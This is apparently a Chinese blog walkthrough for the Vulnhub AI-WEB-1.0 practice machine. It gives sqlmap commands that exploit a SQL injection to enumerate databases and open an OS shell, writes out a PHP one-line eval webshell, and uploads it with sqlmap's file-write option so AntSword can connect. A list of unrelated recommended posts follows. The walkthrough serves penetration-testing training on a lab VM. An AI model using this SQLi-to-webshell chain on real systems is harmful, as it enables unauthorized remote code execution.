【Vulnhub靶场AI-WEB-1.0打靶教程】

第一步:查看虚拟机的ip

第二步:扫描ip下开放的80端口

第三步:扫描查到的ip地址下的目录

第四步:访问查到的目录

访问robot.txt

第五步:访问robot.txt显示出的目录

第六步:打开kali终端,使用sqlmap功能

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs --batch

查到数据库名

进行os-shell连接

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --os-shell

在kali里面/home/kali/目录下创建一个1.php写入一句话木马。语句如下:

php 复制代码
<?php @eval($_POST['pass']);?>

再打开一个终端页面输入命令

sqlmap -u "http://192.168.189.153/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

然后返回之前的终端页面输入命令ls查看目录,看到了木马文件上传成功

第七步:打卡蚁剑访问即可

相关推荐
啵啵鱼爱吃小猫咪1 小时前
Ubuntu 20.04 + ROS Noetic 源码安装 libfranka 0.8.0 和 franka_ros 0.8.0 完整教程
linux·运维·ubuntu
Piko6142 小时前
锐捷 VSU 虚拟化堆叠配置
运维·网络·笔记
ljs6482739512 小时前
Linux运维实操:vi编辑器永久配置静态IP(CentOS系列)
linux·运维·编辑器
2301_780303902 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
AOwhisky2 小时前
Python 学习笔记(第三期)——流程控制:条件判断与循环结构
运维·笔记·python·学习·云原生·流程控制·循环
IpdataCloud3 小时前
AI生成的Avalon恶意框架怎么防?用IP离线库识别模块化C2通信
运维·人工智能·网络协议·tcp/ip·ip
极客先躯3 小时前
高级java每日一道面试题-2026年03月30日-实战篇[Docker]-如何监控容器的网络流量?
java·运维·docker·容器·prometheus·高级面试
Waay3 小时前
Linux 三个核心环境变量配置文件、作用域、生效方式完整梳理
linux·运维·学习·云原生·容器
Piko6144 小时前
锐捷交换机 DHCP Server部署
运维·网络·笔记
jieyucx4 小时前
Shell实战:无限循环监控Nginx服务,异常自动重启+双份日志留存
linux·运维·nginx·自动化·shell